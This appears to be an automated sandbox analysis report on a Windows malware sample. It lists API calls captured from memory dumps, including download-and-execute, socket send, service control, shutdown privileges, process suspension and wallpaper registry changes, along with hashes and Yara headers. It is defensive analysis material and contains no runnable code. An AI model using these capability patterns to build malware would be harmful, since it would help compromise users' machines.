• Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
Yara matches
Similarity
• API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
• String ID:
• API String ID: 4043647387-0
• Opcode ID: e8707b4ec4f65b3daa3568d955911baa256536beff12142bcc10b341d26decda
• Instruction ID: d6647de2ed81915fd1100427b9b1f0ab8477674b12134c2b00fdd843198b9521
• Instruction Fuzzy Hash: 0DA16E719001089BCB14EBA1DD92AEDB779AF54318F10427FF506B71D2EF385E498B98
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,00419A10,00000000,00000000), ref: 00419DC3
• OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00419A10,00000000,00000000), ref: 00419DD8
• CloseServiceHandle.ADVAPI32(00000000,?,?,00419A10,00000000,00000000), ref: 00419DE5
• StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00419A10,00000000,00000000), ref: 00419DF0
• CloseServiceHandle.ADVAPI32(00000000,?,?,00419A10,00000000,00000000), ref: 00419E02
• CloseServiceHandle.ADVAPI32(00000000,?,?,00419A10,00000000,00000000), ref: 00419E05
Memory Dump Source
• Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ManagerStart
• String ID:
• API String ID: 276877138-0
• Opcode ID: cfc7b607e36d21359a02d5afcedae3f84f405620953c8a7715537af6fd2295c5
• Instruction ID: bfab90d9ddd5c2d56401b7e15998ac1c6a079cb4321381bf248b2ffa9e014974
• Instruction Fuzzy Hash: 60F0E9715403146FD2115B31EC88DBF2A6CDF85BB2B01002EF442A3191CF78CD4995B5
APIs
  • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
  • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
  • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
  • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443F03,?,?,?,?,?,?,00000004), ref: 00450D71
• _wcschr.LIBVCRUNTIME ref: 00450E01
• _wcschr.LIBVCRUNTIME ref: 00450E0F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443F03,00000000,00444023), ref: 00450EB2
Strings
Memory Dump Source
• Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
Yara matches
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID: (E
• API String ID: 4212172061-542121585
• Opcode ID: 59e7985f3c02f7c10489d8edf0480172058bbcb387fbadea5ac0dcfc1ce8ddaa
• Instruction ID: 16e6850baad922d2e300dda2121b2fdf61a8ef58a3873fa5b3432b878cecddba
• Instruction Fuzzy Hash: A361FC7A500306AAD725AB75CC42ABB73A8EF44316F14082FFD05D7243EB78E949C769
APIs
  • Part of subcall function 00416C9D: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416CAA
  • Part of subcall function 00416C9D: OpenProcessToken.ADVAPI32(00000000), ref: 00416CB1
  • Part of subcall function 00416C9D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416CC3
  • Part of subcall function 00416C9D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416CE2
  • Part of subcall function 00416C9D: GetLastError.KERNEL32 ref: 00416CE8
• ExitWindowsEx.USER32(00000000,00000001), ref: 00415AF3
• LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415B08
• GetProcAddress.KERNEL32(00000000), ref: 00415B0F
Strings
Memory Dump Source
• Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
Yara matches
Similarity
• API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
• String ID: PowrProf.dll$SetSuspendState
• API String ID: 1589313981-1420736420
• Opcode ID: e283aed8030f222677e32f677a5842ddb3918d5861ff5db7f0a7df2b8037313d
• Instruction ID: be3657bdb4b9c596b700244bf1edaf45c421fe256a6f88bebcc25452880e9c8a
• Instruction Fuzzy Hash: 84215E71644741A6CB14FBB198A6AFF22599F80748F40483FB442771D2EF7CE889865E
APIs
• GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451712,?,00000000), ref: 0045148C
• GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451712,?,00000000), ref: 004514B5
• GetACP.KERNEL32(?,?,00451712,?,00000000), ref: 004514CA
Strings
Memory Dump Source
• Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
APIs
• FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A85B
• LoadResource.KERNEL32(00000000,?,?,0040E25B,00000000), ref: 0041A86F
• LockResource.KERNEL32(00000000,?,?,0040E25B,00000000), ref: 0041A876
• SizeofResource.KERNEL32(00000000,?,?,0040E25B,00000000), ref: 0041A885
Strings
Yara matches
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID: SETTINGS
• API String ID: 3473537107-594951305
APIs
• __EH_prolog.LIBCMT ref: 00407A91
• FindFirstFileW.KERNEL32(00000000,?,00466AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
Yara matches
Similarity
• API ID: Find$File$CloseFirstH_prologNext
• String ID:
• API String ID: 1157919129-0
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
Strings
• open, xrefs: 0040622E
• C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, xrefs: 0040627F, 004063A7
Yara matches
Similarity
• API ID: DownloadExecuteFileShell
• String ID: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe$open
• API String ID: 2825088817-1241815004
APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
  • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
Strings
Yara matches
Similarity
• API ID: FileFind$FirstNextsend
• String ID: pPG$pPG
• API String ID: 4113138495-3204143781
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BE77
  • Part of subcall function 004127AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004127B9
  • Part of subcall function 004127AA: RegSetValueExA.KERNEL32(?,XwF,00000000,?,00000000,00000000,00475308,?,?,0040E6D3,00467758,6.0.0 Pro), ref: 004127E1
  • Part of subcall function 004127AA: RegCloseKey.KERNEL32(?,?,?,0040E6D3,00467758,6.0.0 Pro), ref: 004127EC
Strings
Yara matches
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
APIs
• __EH_prolog.LIBCMT ref: 00408DAC
• FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
• FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
Yara matches
Similarity
• API ID: FileFind$FirstH_prologNext
• String ID:
• API String ID: 301083792-0
APIs
  • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
  • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
  • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
  • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
  • Part of subcall function 004470CF: _free.LIBCMT ref: 0044712E
  • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 0044713B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004510CE
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004511DF
Yara matches
Similarity
• API ID: ErrorInfoLastLocale$_free$_abort
• String ID:
• API String ID: 2829624132-0
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A965
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A96F
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A97C
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• GetCurrentProcess.KERNEL32(?,?,0044273A,?,0046EAF0,0000000C,00442891,?,00000002,00000000), ref: 00442785
• TerminateProcess.KERNEL32(00000000,?,0044273A,?,0046EAF0,0000000C,00442891,?,00000002,00000000), ref: 0044278C
• ExitProcess.KERNEL32 ref: 0044279E
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
APIs
• OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041525B,00000000), ref: 0041AED7
• NtSuspendProcess.NTDLL(00000000), ref: 0041AEE4
• CloseHandle.KERNEL32(00000000,?,?,0041525B,00000000), ref: 0041AEED
Yara matches
Similarity
• API ID: Process$CloseHandleOpenSuspend
• String ID:
• API String ID: 1999457699-0
APIs
• OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415280,00000000), ref: 0041AF03
• NtResumeProcess.NTDLL(00000000), ref: 0041AF10
• CloseHandle.KERNEL32(00000000,?,?,00415280,00000000), ref: 0041AF19
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseHandleOpenResume
                                                          • String ID:
                                                          • API String ID: 3614150671-0
                                                          • Opcode ID: 6d31317880465a65d63f867429a7c123c2a1788788c54349cbb6221ea43f3537
                                                          • Instruction ID: 5834692e6dbfc7302e0627ffd9745f57241b902771746b5adb28784224297b78
                                                          • Opcode Fuzzy Hash: 6d31317880465a65d63f867429a7c123c2a1788788c54349cbb6221ea43f3537
                                                          • Instruction Fuzzy Hash: 7CD05E32504121638220176A6C0D997ED68DBC5AB3702422AF504D22219E30C881C6A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .
                                                          • API String ID: 0-248832578
                                                          • Opcode ID: 90d0b4729825bd90b6a9b0e481f721cabe6d10aefd9ef70f2d231800c5ca14c4
                                                          • Instruction ID: eafca5d3f29716c6c78e4e4ea3ad02361a474eaab44c7f235df41bcab4a95e78
                                                          • Opcode Fuzzy Hash: 90d0b4729825bd90b6a9b0e481f721cabe6d10aefd9ef70f2d231800c5ca14c4
                                                          • Instruction Fuzzy Hash: 3431F472D00249ABEB249E79CC85EFB7BBDDB85314F0401AEF419D7251E6349E418B54
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004477FA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: GetLocaleInfoEx
                                                          • API String ID: 2299586839-2904428671
                                                          • Opcode ID: 6bd799bfac9af36fd133eb5d72b5b36b41e76e7aabeb18fd4f2c376b7933ddb9
                                                          • Instruction ID: 58a0a1dc03b065be57d87c6409a63545e464c60cfee5b8c381720ea1698dad41
                                                          • Opcode Fuzzy Hash: 6bd799bfac9af36fd133eb5d72b5b36b41e76e7aabeb18fd4f2c376b7933ddb9
                                                          • Instruction Fuzzy Hash: A0F0F631640318B7DB056F61CC06F6E7B64DB04712F10019AFC0467252CF75AB119A9D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 49a3bfabf79a65c690f97e76fe456cb77f79ea6cd6c50daa38502d700b1f7d22
                                                          • Instruction ID: e2cf6eb340ac48f4c2d61266dea52d41f096047f3e1279b99095df37311d6468
                                                          • Opcode Fuzzy Hash: 49a3bfabf79a65c690f97e76fe456cb77f79ea6cd6c50daa38502d700b1f7d22
                                                          • Instruction Fuzzy Hash: 6A023D71E002199BEF14CFA9C9806AEB7F1FF48314F15826AD919E7354D734AE41CB94
                                                          APIs
                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004522DD,?,?,00000008,?,?,00455622,00000000), ref: 0045250F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3997070919-0
                                                          • Opcode ID: d07e5f888e39d313e61fc9618f59c4e8dd55f143eba3426c2705e6c45139c68f
                                                          • Instruction ID: f5116c66f7d103febd2a8608562706e5703b7900b8c4b7f838cfdcb30f3e5b5c
                                                          • Opcode Fuzzy Hash: d07e5f888e39d313e61fc9618f59c4e8dd55f143eba3426c2705e6c45139c68f
                                                          • Instruction Fuzzy Hash: A3B19D312106089FD714CF28C586B557BE0FF06366F29865AEC9ACF2A2C379D986CB44
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: b6bf49add14664c6f8016bf54831dc2d1fc9c90be302da46ea9abcdaf86f1ea8
                                                          • Instruction ID: 31134252bc459ed72560d692cedbd99cf1c15514e9e569b0755b2466d1e16266
                                                          • Opcode Fuzzy Hash: b6bf49add14664c6f8016bf54831dc2d1fc9c90be302da46ea9abcdaf86f1ea8
                                                          • Instruction Fuzzy Hash: 0B0285327083418BD714DF29D951B2EF3E1BFCC768F15892EF4899B381DA78A8058B85
                                                          APIs
                                                            • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                            • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                            • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                            • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                            • Part of subcall function 004470CF: _free.LIBCMT ref: 0044712E
                                                            • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 0044713B
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045131E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                                          • String ID:
                                                          • API String ID: 1663032902-0
                                                          • Opcode ID: bc85fdc09d4fce3dfbe50538f39d64f32c4b6099e2a05669c9b1daebb1f6e385
                                                          • Instruction ID: 0b21b5069fbf1db5bec531630a8d3eee6f1f474d64bb54c6a1c44a3d8e2cc721
                                                          • Opcode Fuzzy Hash: bc85fdc09d4fce3dfbe50538f39d64f32c4b6099e2a05669c9b1daebb1f6e385
                                                          • Instruction Fuzzy Hash: 2221D372501206ABEB24AB25CC61B7B77ACEB04316F10017BFD01D6663EB78AD49CB58
                                                          APIs
                                                            • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                            • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                            • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                            • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                          • EnumSystemLocalesW.KERNEL32(0045107A,00000001,00000000,?,00443EFC,?,004516A7,00000000,?,?,?), ref: 00450FC4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID:
                                                          • API String ID: 1084509184-0
                                                          • Opcode ID: 2806d9e87b91580947c38d8a0617f63d2b95e775220bf3e675df36a013b02c7b
                                                          • Instruction ID: 451a354658792f2252a151bea30e2a99c0585190810680eeac5085bd3c0c80bb
                                                          • Opcode Fuzzy Hash: 2806d9e87b91580947c38d8a0617f63d2b95e775220bf3e675df36a013b02c7b
                                                          • Instruction Fuzzy Hash: FD11293B2007019FDB28AF39C8916BABB92FF8435AB14442DE94747B41D7B9B847C744
                                                          APIs
                                                            • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                            • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                            • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                            • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451298,00000000,00000000,?), ref: 00451526
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$InfoLocale_abort_free
                                                          • String ID:
                                                          • API String ID: 2692324296-0
                                                          • Opcode ID: e61a00dc03fcb481ae1f4eaad0348555d58099959c5ffac150b0217cf8aecc77
                                                          • Instruction ID: d2fe2c3fce417e68b0623dfb5eb434355baf81d8c10f12b7a8aa08190ad777f0
                                                          • Opcode Fuzzy Hash: e61a00dc03fcb481ae1f4eaad0348555d58099959c5ffac150b0217cf8aecc77
                                                          • Instruction Fuzzy Hash: 4AF0F9326102197BDB289A258C46BBB7758EB80755F04046AEC07A3251FA78FD45C6D4
                                                          APIs
                                                            • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                            • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                            • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                            • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                          • EnumSystemLocalesW.KERNEL32(004512CA,00000001,?,?,00443EFC,?,0045166B,00443EFC,?,?,?,?,?,00443EFC,?,?), ref: 00451039
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
